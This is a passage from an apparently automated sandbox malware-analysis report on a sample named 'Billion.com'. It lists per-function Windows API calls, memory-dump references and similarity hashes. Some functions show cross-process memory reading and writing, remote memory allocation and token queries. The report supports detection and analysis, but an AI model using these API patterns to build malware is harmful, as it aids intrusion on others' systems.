                                                                                                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 0019F2CE
                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32 ref: 0019F30A
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2833360925-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 6240f5b086e57142275739ba7c3e5808d94010e739cfd8e5116013fa6cd52780
                                                                                                                                                                                                                                                                                                          • Instruction ID: 97b4c46d7314d7b00f715b437a1cd9792f951a769cd30482576874266c736519
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6240f5b086e57142275739ba7c3e5808d94010e739cfd8e5116013fa6cd52780
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4012971D01619EBCF00AFE4E849AEEBB78FB08711F06046AE502F2690DB349695C7A1
                                                                                                                                                                                                                                                                                                          Function 00191A45 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00191A60
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,001914E7,?,?,?), ref: 00191A6C
                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,001914E7,?,?,?), ref: 00191A7B
                                                                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,001914E7,?,?,?), ref: 00191A82
                                                                                                                                                                                                                                                                                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00191A99
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 842720411-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: ebb68a3378c6c80a35019c3e57c4a54a6e6e66a09e622b9fda4b6fa7521752de
                                                                                                                                                                                                                                                                                                          • Instruction ID: ef0a0f6b10c71c84dbd66c21cfd50c9477510fb7268520075300dcec7385d001
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ebb68a3378c6c80a35019c3e57c4a54a6e6e66a09e622b9fda4b6fa7521752de
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D70181B5601606BFDF114F65EC48E6A3F6EEF84364B210464F845C3360DB31DC80CA60
                                                                                                                                                                                                                                                                                                          Function 00191900 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00191916
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00191922
                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00191931
                                                                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00191938
                                                                                                                                                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0019194E
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 44706859-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 159dbaf6f6d9bb113c03c606f5140c2e5107294118dc9c178d75afda4119fae2
                                                                                                                                                                                                                                                                                                          • Instruction ID: 3c53a584005ba256eefcb33789eb0869ce1ce95281ff1f65f8e62e4eafc29a71
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 159dbaf6f6d9bb113c03c606f5140c2e5107294118dc9c178d75afda4119fae2
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DBF04975200302BBDB210FA9AC49F563FADEF897A0F610424FE45D72A0CA70DC918A60
                                                                                                                                                                                                                                                                                                          Function 00191960 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00191976
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00191982
                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00191991
                                                                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00191998
                                                                                                                                                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001919AE
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 44706859-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: e69a25e82db95c5c3a33d9c64ecbbbeef48d851ec7c497d3cefbd1c69d4b4654
                                                                                                                                                                                                                                                                                                          • Instruction ID: 24b8862163a8eebe8e7680edbf8dca4ba4a77532eff929ccf1562b3755531da1
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e69a25e82db95c5c3a33d9c64ecbbbeef48d851ec7c497d3cefbd1c69d4b4654
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9F06D75240302BBDB214FA9EC59F563FADFF897A0F610424FE45C72A0CB70E8918A60
                                                                                                                                                                                                                                                                                                          Function 001A0CB6 Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,001A0B24,?,001A3D41,?,00000001,00173AF4,?), ref: 001A0CCB
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,001A0B24,?,001A3D41,?,00000001,00173AF4,?), ref: 001A0CD8
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,001A0B24,?,001A3D41,?,00000001,00173AF4,?), ref: 001A0CE5
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,001A0B24,?,001A3D41,?,00000001,00173AF4,?), ref: 001A0CF2
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,001A0B24,?,001A3D41,?,00000001,00173AF4,?), ref: 001A0CFF
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,001A0B24,?,001A3D41,?,00000001,00173AF4,?), ref: 001A0D0C
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 35ef6480d229fbd28aee7e8a84549fc2df13391e3279d702881990038d0a2ccf
                                                                                                                                                                                                                                                                                                          • Instruction ID: df613a98cf7395019a2c2dbcc784d28a6e637f871af6fb21f110a65b54e451ab
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35ef6480d229fbd28aee7e8a84549fc2df13391e3279d702881990038d0a2ccf
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2301EEB6800B15DFCB31AFA6D880812FBF9BF503253108A3ED09352931C7B0A888CF80
                                                                                                                                                                                                                                                                                                          Function 001965AB Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 001965BF
                                                                                                                                                                                                                                                                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 001965D6
                                                                                                                                                                                                                                                                                                          • MessageBeep.USER32(00000000), ref: 001965EE
                                                                                                                                                                                                                                                                                                          • KillTimer.USER32(?,0000040A), ref: 0019660A
                                                                                                                                                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 00196624
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3741023627-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 3c5598d03df6ec96939bfd1a84ab1ea10a646d642e006a4dedfd273af2cd73d0
                                                                                                                                                                                                                                                                                                          • Instruction ID: 5b4bc303c760cd9bc8dd2c09db6799c4ca5d59562454ca43e0af804f2a5486d4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c5598d03df6ec96939bfd1a84ab1ea10a646d642e006a4dedfd273af2cd73d0
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E018130500714ABEF245F60EE4EF967BB8FB10705F010669B187A14E1EBF0AA84CAA0
                                                                                                                                                                                                                                                                                                          Function 0016DABA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0016DAD2
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00162D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0016DB51,00201DC4,00000000,00201DC4,00000000,?,0016DB78,00201DC4,00000007,00201DC4,?,0016DF75,00201DC4), ref: 00162D4E
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00162D38: GetLastError.KERNEL32(00201DC4,?,0016DB51,00201DC4,00000000,00201DC4,00000000,?,0016DB78,00201DC4,00000007,00201DC4,?,0016DF75,00201DC4,00201DC4), ref: 00162D60
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0016DAE4
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0016DAF6
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0016DB08
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0016DB1A
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: d460d88d9f1513c4dcfd98ba26c5f707163a3f05a2ab9d1f9b5028cd2bd6b72b
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7015dd97c1d9210a607d74f3017e03cfa32485b98709fb748a267021a96c05da
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d460d88d9f1513c4dcfd98ba26c5f707163a3f05a2ab9d1f9b5028cd2bd6b72b
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CF01D32A48604AB8624EBA9FD82C3A77EEFF157907A50C45F009D7941CB30FCA0CA64
                                                                                                                                                                                                                                                                                                          Function 00162610 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0016262E
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00162D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0016DB51,00201DC4,00000000,00201DC4,00000000,?,0016DB78,00201DC4,00000007,00201DC4,?,0016DF75,00201DC4), ref: 00162D4E
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00162D38: GetLastError.KERNEL32(00201DC4,?,0016DB51,00201DC4,00000000,00201DC4,00000000,?,0016DB78,00201DC4,00000007,00201DC4,?,0016DF75,00201DC4,00201DC4), ref: 00162D60
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00162640
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00162653
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00162664
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00162675
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: e10ddf55cb32d15d2f945d546f87ab6cd9820c3a9a5d61b6aeaaa81c4265ecd4
                                                                                                                                                                                                                                                                                                          • Instruction ID: ad41e1e683a44e6fb89a8060aed14ebf75460aa705f258eb1c8c42eb5750ad5d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e10ddf55cb32d15d2f945d546f87ab6cd9820c3a9a5d61b6aeaaa81c4265ecd4
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9F0DA70801B219BCB02AFD4FC0D8683BA5BB257A1305091BF814D6676CB310961BF85
                                                                                                                                                                                                                                                                                                          Function 001612B7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: __freea$_free
                                                                                                                                                                                                                                                                                                          • String ID: a/p$am/pm
                                                                                                                                                                                                                                                                                                          • API String ID: 3432400110-3206640213
                                                                                                                                                                                                                                                                                                          • Opcode ID: e4412c9d91f8621f8e6504e2a8147a185e15daa9026c142a62a0a6f762fe106c
                                                                                                                                                                                                                                                                                                          • Instruction ID: ba539f88e4efbccb6b1d264b28894a01591f5c99c7c582cab50c01794bcdc592
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e4412c9d91f8621f8e6504e2a8147a185e15daa9026c142a62a0a6f762fe106c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ADD11479900206FBCB289F68CC55BFAB7B1FF16310F2D415AE9029B250D7B59DA0CB90
                                                                                                                                                                                                                                                                                                          Function 00193063 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00192B1D,?,?,00000034,00000800,?,00000034), ref: 0019BDF4
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 001930AD
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00192B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 0019BDBF
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 0019BD1C
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00192AE1,00000034,?,?,00001004,00000000,00000000), ref: 0019BD2C
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00192AE1,00000034,?,?,00001004,00000000,00000000), ref: 0019BD42
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0019311A
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00193167
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                                                                                          • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                                                                                          • Opcode ID: e6982e4af51900145163ba1bcf1c5629b5b2c32fcfadbaca703d255eb1e35803
                                                                                                                                                                                                                                                                                                          • Instruction ID: a686b8bd78e85cb9fa99caa067de0d6f6e386c63f6b451d601890c1f73b6b2a5
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6982e4af51900145163ba1bcf1c5629b5b2c32fcfadbaca703d255eb1e35803
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4412772900218BEDF10DBA4DD85AEEBBB8EF59704F0040A5FA55B7190DB70AF85CB61
                                                                                                                                                                                                                                                                                                          Function 00161A9E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\680662\Billion.com,00000104), ref: 00161AD9
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00161BA4
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00161BAE
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
